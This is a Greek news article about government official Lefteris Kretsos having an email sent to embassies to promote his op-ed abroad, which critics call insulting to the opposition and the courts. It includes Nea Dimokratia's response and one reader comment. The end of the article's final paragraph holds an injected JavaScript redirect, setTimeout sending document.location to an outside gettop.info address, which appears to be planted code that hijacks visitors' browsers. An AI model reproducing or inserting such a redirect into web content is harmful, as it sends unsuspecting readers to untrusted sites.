Υβριστικό άρθρο Κρέτσου για την αντιπολίτευση προς τις πρεσβείες «ανάβει φωτιές»

1
2

 

Την αντίδραση της αντιπολίτευσης προκάλεσε η αποκάλυψη ότι η κυβέρνηση διαμέσω του γγ Ενημέρωσης κι Επικοινωνίας Λευτέρη Κρέτσου απέστειλε έγγραφο σε όλες τις πρεσβείες της Ελλάδας στο εξωτερικό να το… «αξιοποιήσουν» προωθώντας το στα διεθνή ΜΜΕ. Το κείμενο σύμφωνα με το liberal.gr που αποκαλύπτει το γεγονός είναι υβριστικό για την αντιπολίτευση καθώς και για τη Δικαοσύνη!

Συγκεκριμένα, όπως αναφέρει το liberal.gr, ανήμερα της 28ης Οκτωβρίου, εστάλη από τη διευθύντρια της Διεύθυνσης Υπηρεσιών Εξωτερικού της ΓΓ Ενημέρωσης Κατερίνα Λάμπρου, email προς όλες τις πρεσβείες μας στο εξωτερικό με εντολή προβολής στα ΜΜΕ του εξωτερικού του Άρθρου του Λ. Κρέτσου σε εφημερίδα των Αθηνών με τίτλο «Ποιος κυβερνά αυτόν τον τόπο;»

Στο email η υφισταμένη του κ. Κρέτσου παροτρύνει τους δικούς της υφισταμένους να «αξιοποιήσουν» το άρθρο Κρέτσου, δηλαδή επί της ουσίας να το προωθήσουν στα ΜΜΕ της χώρας όπου υπηρετούν, ενημερώνοντάς τους παράλληλα ότι το «Γραφείο Τύπου της χώρας μας στο Παρίσι, έχει ήδη μεταφράσει το κείμενο Κρέτσου στη γαλλική γλώσσα»!

Όπως δημοσίευσε και η aixmi.gr το άρθρο του κ. Κρέτσου είναι μία οξύτατη επίθεση του γγ Ενημέρωσης στους θεσμούς της πατρίδας του, κυρίως στην αντιπολίτευση και τη δικαιοσύνη. Στο άρθρο του κ. Κρέτσου, μεταξύ άλλων, αναφέρεται ότι: «Η ΝΔ και το ΠΑΣΟΚ ήταν και είναι πολιτικοί βραχίονες των διαπλεκόμενων συμφερόντων», «το κράτος, όμως, δεν μπορεί να είναι όμηρος των επιδιώξεων και των μικροπολιτικών σκοπιμοτήτων της ηγεσίας της ΝΔ» ενώ επαναλαμβάνει τη γνωστή του άποψη για τις αποφάσεις της δικαιοσύνης αναφέροντας ότι «Οι αποφάσεις του ΣτΕ και των δικαστηρίων είναι δεσμευτικές. Αυτό βέβαια δεν σημαίνει απαραίτητα ότι αξίζουν τον σεβασμό των πολιτών». Στο άρθρο αφήνονται τέλος υπονοούμενα ακόμα και για την ηθική των δικαστών του ΣτΕ, αφού αναφέρεται με δηκτικό τρόπο ότι «μπορεί κάποιοι δικαστές του ΣτΕ να είναι υπεράνω χρημάτων».

Στην αποκάλυψη αυτή αντέδρασε αμέσως η Νέα Δημοκρατία που με ανακοίνωσή της τονίζει: «Η σημερινή αποκάλυψη της ιστοσελίδας “liberal” αποδεικνύει το πραγματικό πρόσωπο της Κυβέρνησης και προσωπικά του Γενικού Γραμματέα Ενημέρωσης» και προστίθεται: «Ο κ. Κρέτσος, βαρύτατα εκτεθειμένος από τη διεξαγωγή του διαγωνισμού – φιάσκου για τις τηλεοπτικές άδειες, το μόνο που τον ενδιαφέρει είναι να συκοφαντεί στα διεθνή Μ.Μ.Ε. την Αντιπολίτευση και τη Δικαιοσύνη της χώρας μας», συνεχίζει η ανακοίνωση της ΝΔ. «Ο πανικός και η κατρακύλα της Κυβέρνησης Τσίπρα – Παππά και του κ. Κρέτσου δεν έχουν τέλος. Ντροπή», καταλήγει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Είναι επικίνδυνοι και αυτό δεν αποδεικνύεται μόνο με την επιστολή Κρέτσου. Προσπαθούν να γίνουν κι αυτοί καθεστώς και γι’ αυτό ισοπεδώνουν ό,τι βρούνε μπροστά τους και είναι αντίθετο με τις ορέξεις τους.Πρέπει να φύγουν μια ώρα αρχίτερα.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here